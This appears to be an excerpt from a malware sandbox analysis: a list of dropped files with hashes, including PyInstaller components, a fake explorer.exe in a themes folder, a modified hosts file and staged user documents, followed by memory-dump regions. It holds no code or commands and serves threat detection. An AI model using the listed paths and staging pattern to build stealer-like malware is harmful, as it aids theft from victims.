SHA5120074b3e365782721de8d0a6ee4aa43871d9498eae07a24443b84b755fa00ec3335e42aedeefed0499e642bde9f4ad08843f36b97e095ef212ec29db022676a42
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_queue.pydFilesize
26KB
MD5a56e79b7526129f06c4feacf1f8ed117
SHA199f4b0e65c01604f1f5beaff1c0549b1c5a807c5
SHA256dff778a28f75ea484a8e2e91c31235eb8d44128f5ace83491e4fbe923addffad
SHA512b1f1fee24e1041424e5e05e2087440a6b9eb79ab57367d6f83fa83c6a39c7eb693d6edac9a7ac1c22a26109014fb4a12ef31b33775b23e857afeca777ae0bbcb
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_socket.pydFilesize
44KB
MD5cd2becb9c6dc5cc632509da8cbd0b15d
SHA128a705e779ed0e40651875cb62fa8e07d3e27e10
SHA2562a56f2fdbd69a386924d2c00266f1a57954e09c9eb022280be713d0c6ef805ce
SHA512fb22b719d4db4c50ab11984ba1bef29a2154d3f2a283b9fa407fd5ec079b67bedf188d5bb94b45b3d18e9000dce11ebf8bb3cd35d465ccbe49c54e150d21a62a
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_sqlite3.pydFilesize
57KB
MD5a045491faa0cba94b3230b254db7f2d2
SHA111a87b7f872e24bab0b278bd88c514b5788975b1
SHA25679769e9318b6e525a145293affedc97b5e7a2e994c88f9df445b887df75f92ee
SHA512a279306e78f34feed13dedd7ecedd226304d5f06746a14c0f9759a7191953de6409b244d23629b25fe9c4a374528ffc6ac92bd1090e218ee5962815491fdcb43
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\_ssl.pydFilesize
65KB
MD57b0d6d717535bc48f0176fd6455a133b
SHA1a3fd5e6495d961eeaa66ccb7b2a8135812210356
SHA2563e2d13bda93c59fdd1b9bbb2b30c682774e8da4503248e96e0e3c1b0fe588ce7
SHA512861443c982a821f61bd971f57f65998366f325d084f21636e38f91aaaac752e7dc2b2344f414db3cb7fddec08210cfc197c1815a44e9b726ff5eabe2c62f42f9
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\base_library.zipFilesize
1.3MB
MD5ccee0ea5ba04aa4fcb1d5a19e976b54f
SHA1f7a31b2223f1579da1418f8bfe679ad5cb8a58f5
SHA256eeb7f0b3e56b03454868411d5f62f23c1832c27270cee551b9ca7d9d10106b29
SHA5124f29ac5df211fef941bd953c2d34cb0c769fb78475494746cb584790d9497c02be35322b0c8f5c14fe88d4dd722733eda12496db7a1200224a014043f7d59166
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\blank.aesFilesize
115KB
MD57ce138b2c0b8689475c61d3fa5ece79a
SHA170d12f62b136392be850260059a2db6a97e3da58
SHA2568a4badcec2c7ec8379068eac2711228992745be2effc8b6fa212a1e8d315bfcc
SHA5126f7a66cfcb860f92b74c4bbc50285a20d6cf14399eae345ca8ccf1fae4377d4f618e6634ba337e1e4e7de21c6b34af589ce8b16293ef85780797c70357122cfb
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\libcrypto-3.dllFilesize
1.6MB
MD527515b5bb912701abb4dfad186b1da1f
SHA13fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\libffi-8.dllFilesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\libssl-3.dllFilesize
223KB
MD56eda5a055b164e5e798429dcd94f5b88
SHA12c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA51274283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\python312.dllFilesize
1.8MB
MD52f1072ddd9a88629205e7434ed055b3e
SHA120da3188dabe3d5fa33b46bfe671e713e6fa3056
SHA256d086257a6b36047f35202266c8eb8c1225163bd96b064d31b80f0dbe13da2acf
SHA512d8dddc30733811ed9a9c4ae83ac8f3fc4d8ba3fa8051d95242fbd432fd5bf24122373ac5eea9fec78f0daf7c1133365f519a13cf3f105636da74820a00a25e9b
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\rar.exeFilesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\rarreg.keyFilesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\select.pydFilesize
25KB
MD579bb09417365e9b66c8fb984cbb99950
SHA1517522dbcbefb65e37e309cb06fed86c5f946d79
SHA25694f2bac05e32cb3791f66efb3229c932ab71bc3725a417340304219721b0d50d
SHA5121c2129dd4d8febe2886e122868956ba6032a03b1297da095d3e9c02ab33183d964a8f790086e688b0720ab39aa1e8d0fe91fadbbe99035baf4d7cc5754de9e64
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\sqlite3.dllFilesize
630KB
MD55655f540da3e3bd91402e5e5b09a6d2f
SHA1d44db47026b330d06fa84128fd9f0241f5752011
SHA256aa05807dfa35d6fbe1484728110430802a791f3f8723f824696f2d6bd9c5b69a
SHA5121205dcd5657dcc457f8d02452c47fcb2e7fee108a675aaddc9f7b82d1f2371e38080a6fa0f767524f835c544f129b6f71b2d716180d196b18a9a6dbef6c9bf03
-
C:\Users\Admin\AppData\Local\Temp\_MEI29042\unicodedata.pydFilesize
295KB
MD520f206b5b405d837c201b8fb443cfa5a
SHA1f06b062505f7218d49a1ef0ea65c6212dc4105b0
SHA2560ae76f7316506bcaa4a59f31817569129fd1baaaba89032953785dbf9f7a7242
SHA512b36e4af96bef6b8c13d509b66c34f1cdf6ac8830267fabc13a811d7d486d938d798b32b4d195fea762ee550501002674d6681f8985318990b454a5bc5c982088
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olrcjxih.0bb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\abavsymn\abavsymn.dllFilesize
4KB
MD5ab50247b87279cff37eff5872a42d392
SHA10171b080413691cb4d3b54c5efcedbca98dbd2c6
SHA25681de0bd1b7c81f90b1c7982b9f101aa33e2f069ce85273aca67a413dda17ff10
SHA512496ebfa7ceaa357977991865d8bde47edf3a406675ce931946a0a80d03522dbabfeb540c05957db0730c4d80039f966557a6067d42f584c82cec95c181500b92
-
C:\Users\Admin\AppData\Local\Temp\zyron.exeFilesize
20.0MB
MD56b9890a680fb22f32d8318ca466145ad
SHA169380599cb62403138660cb08c59ece67dc3d388
SHA25600a2dcab663ed13d838b665b3db093bcc44c610399148a9f643c044c1f90aca9
SHA512565ce693948c92741c94793e82625bc92c42c407d496519205f475b12131d55e224b21571c0c173507a2a2a4382d2b4d2c0e4a3ad7cba374fa82d79001e5058c
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ConnectOut.txtFilesize
685KB
MD5db2992765f62dd108587db2aada043f1
SHA1fe87be4022f6a600608db93702f03f3b5c8af87e
SHA256d6db416954e0cc10b4ef8bd2671d9e8ed5eccf911cba99dae15624d8b5ec8dd4
SHA51255c7c0849c251f2107896e66d43218f004391b749280ac846e05142c04462376ed50bf391a37cfeef45033dda66f9f62538894626d27b8bbc4cd2dfe6d592de9
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\DebugRegister.xlsxFilesize
1.6MB
MD518c64b9fc62e6a705de713cfe07eae2a
SHA1248c071fa48b3bfe3a4ab6b8458d873e0efe39cc
SHA256676478bd36c1294d0028f23e931afeb5bb8028ceb5b3782d4034f02da39d9d24
SHA512dde5f4e0d75ce1b50ad99d378edb792f612459a53eef4fbceb85d5749a50002f596cb2aed4b72548c470595af981845a5d196817f2e9738479a809923b438dfb
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docxFilesize
11KB
MD54a8fbd593a733fc669169d614021185b
SHA1166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA5126b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docxFilesize
11KB
MD5bfbc1a403197ac8cfc95638c2da2cf0e
SHA1634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docxFilesize
11KB
MD53b068f508d40eb8258ff0b0592ca1f9c
SHA159ac025c3256e9c6c86165082974fe791ff9833a
SHA25607db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32
-
C:\Windows\Resources\Themes\explorer.exeFilesize
135KB
MD5480362e1a790718ee24675007ec53488
SHA1ca1e5c7ad0a899490f7f45a150400796897e3735
SHA256b1cf5d529080e54524d672e98052a5beee5038c9d6e57b5fd73014c3b1673138
SHA5127f259c45c9fc42b585c7fb428177c343e9e85d3690c07ed7176a980574ee472c71e5ab81008729ed90a80369991915ba802d6748a99207abfa7f5e0e93f6ca5f
-
C:\Windows\Resources\Themes\icsys.icn.exeFilesize
135KB
MD5d9d99ff21d11fee02e7ba02e45ed4ded
SHA106d96dd1a9a81372cf03f9a0aadf894d4e045fc8
SHA2566b8987d8300274fbf73197d221db5abb9fc84e60daba53d53724795f9f55c0d1
SHA512d3e2a45070f80f000c95ed087812e20c5593a74ece6290cca833a05827c4ad4ca357ccd7747b87f58a3943d0e419fb89ee2a02f786d476f3267773c4fa4b724a
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
\??\c:\Users\Admin\AppData\Local\Temp\abavsymn\CSCD625BD24B259407088673FF6AA1ECEEF.TMPFilesize
652B
MD5c9b5b982a7fbaab99679f2f0120cc8f9
SHA1b5a9988769a0b6c5d1410050beb92281943681fe
SHA25680d974a20509e3167163b19ae5af3fc7f3bab7b32f34f04a2815a9850cf2ed6e
SHA5127c89329902e4b6b9769ef4138a487bd0d7241c0a065c49108c3e4ae2f8157ba33f1dc7ff0f89f7688cb3a5d9b574bee5c88666844c37e9c8920345f9b0fe3cbf
-
\??\c:\Users\Admin\AppData\Local\Temp\abavsymn\abavsymn.0.csFilesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
\??\c:\Users\Admin\AppData\Local\Temp\abavsymn\abavsymn.cmdlineFilesize
607B
MD5df86416763e9126f640814d8212429bd
SHA1214c5fa4aa0bd07befeaefc1d9e32b44fd0d1490
SHA25687c3978d6a24815cffb45e069eb6260ac45436c3b906b676b3c224c9066c36c1
SHA5121888fe28c4c77cbb9f4edfad7c90fd980e4d6cf4efc274385d0df3cf7106dda622d6720e28fb2c3d4b7f271f1f4a05e9415b69c275155cd64ea4eb60acfa00a6
-
memory/212-325-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/676-318-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/676-327-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/3136-96-0x00000134E0D00000-0x00000134E0D22000-memory.dmpFilesize
136KB
-
memory/3880-0-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/3880-329-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/3972-328-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/3972-294-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/4088-224-0x0000023A75620000-0x0000023A75628000-memory.dmpFilesize
32KB
-
memory/4200-386-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/4736-322-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/4736-387-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/4868-78-0x00007FF94CD10000-0x00007FF94CDDD000-memory.dmpFilesize
820KB
-
memory/4868-86-0x00007FF95DFB0000-0x00007FF95DFC4000-memory.dmpFilesize
80KB
-
memory/4868-285-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmpFilesize
1.5MB
-
memory/4868-72-0x00007FF95E010000-0x00007FF95E029000-memory.dmpFilesize
100KB
-
memory/4868-70-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmpFilesize
1.5MB
-
memory/4868-68-0x00007FF95EA50000-0x00007FF95EA74000-memory.dmpFilesize
144KB
-
memory/4868-66-0x00007FF95EF60000-0x00007FF95EF79000-memory.dmpFilesize
100KB
-
memory/4868-293-0x00007FF95E010000-0x00007FF95E029000-memory.dmpFilesize
100KB
-
memory/4868-90-0x00007FF94C6C0000-0x00007FF94C7DB000-memory.dmpFilesize
1.1MB
-
memory/4868-64-0x00007FF95ECA0000-0x00007FF95ECCD000-memory.dmpFilesize
180KB
-
memory/4868-57-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmpFilesize
148KB
-
memory/4868-58-0x00007FF9638B0000-0x00007FF9638BF000-memory.dmpFilesize
60KB
-
memory/4868-305-0x00007FF95DFD0000-0x00007FF95E003000-memory.dmpFilesize
204KB
-
memory/4868-35-0x00007FF94CF60000-0x00007FF94D638000-memory.dmpFilesize
6.8MB
-
memory/4868-226-0x00007FF95EA50000-0x00007FF95EA74000-memory.dmpFilesize
144KB
-
memory/4868-77-0x00007FF95DFD0000-0x00007FF95E003000-memory.dmpFilesize
204KB
-
memory/4868-320-0x00007FF94CD10000-0x00007FF94CDDD000-memory.dmpFilesize
820KB
-
memory/4868-324-0x00007FF94C7E0000-0x00007FF94CD02000-memory.dmpFilesize
5.1MB
-
memory/4868-81-0x00007FF94CF60000-0x00007FF94D638000-memory.dmpFilesize
6.8MB
-
memory/4868-82-0x00007FF94C7E0000-0x00007FF94CD02000-memory.dmpFilesize
5.1MB
-
memory/4868-83-0x000002A7CA770000-0x000002A7CAC92000-memory.dmpFilesize
5.1MB
-
memory/4868-74-0x00007FF961C10000-0x00007FF961C1D000-memory.dmpFilesize
52KB
-
memory/4868-326-0x000002A7CA770000-0x000002A7CAC92000-memory.dmpFilesize
5.1MB
-
memory/4868-341-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmpFilesize
148KB
-
memory/4868-346-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmpFilesize
1.5MB
-
memory/4868-354-0x00007FF94C6C0000-0x00007FF94C7DB000-memory.dmpFilesize
1.1MB
-
memory/4868-340-0x00007FF94CF60000-0x00007FF94D638000-memory.dmpFilesize
6.8MB
-
memory/4868-374-0x00007FF94CD10000-0x00007FF94CDDD000-memory.dmpFilesize
820KB
-
memory/4868-373-0x00007FF95DFD0000-0x00007FF95E003000-memory.dmpFilesize
204KB
-
memory/4868-385-0x00007FF95EA50000-0x00007FF95EA74000-memory.dmpFilesize
144KB
-
memory/4868-384-0x00007FF95EF60000-0x00007FF95EF79000-memory.dmpFilesize
100KB
-
memory/4868-383-0x00007FF95ECA0000-0x00007FF95ECCD000-memory.dmpFilesize
180KB
-
memory/4868-382-0x00007FF9638B0000-0x00007FF9638BF000-memory.dmpFilesize
60KB
-
memory/4868-381-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmpFilesize
148KB
-
memory/4868-380-0x00007FF94CF60000-0x00007FF94D638000-memory.dmpFilesize
6.8MB
-
memory/4868-379-0x00007FF95DFB0000-0x00007FF95DFC4000-memory.dmpFilesize
80KB
-
memory/4868-378-0x00007FF94C6C0000-0x00007FF94C7DB000-memory.dmpFilesize
1.1MB
-
memory/4868-377-0x00007FF961A90000-0x00007FF961A9D000-memory.dmpFilesize
52KB
-
memory/4868-375-0x00007FF94C7E0000-0x00007FF94CD02000-memory.dmpFilesize
5.1MB
-
memory/4868-370-0x00007FF94CDE0000-0x00007FF94CF56000-memory.dmpFilesize
1.5MB
-
memory/4868-372-0x00007FF961C10000-0x00007FF961C1D000-memory.dmpFilesize
52KB
-
memory/4868-371-0x00007FF95E010000-0x00007FF95E029000-memory.dmpFilesize
100KB
-
memory/4868-85-0x00007FF95EDB0000-0x00007FF95EDD5000-memory.dmpFilesize
148KB
-
memory/4868-88-0x00007FF961A90000-0x00007FF961A9D000-memory.dmpFilesize
52KB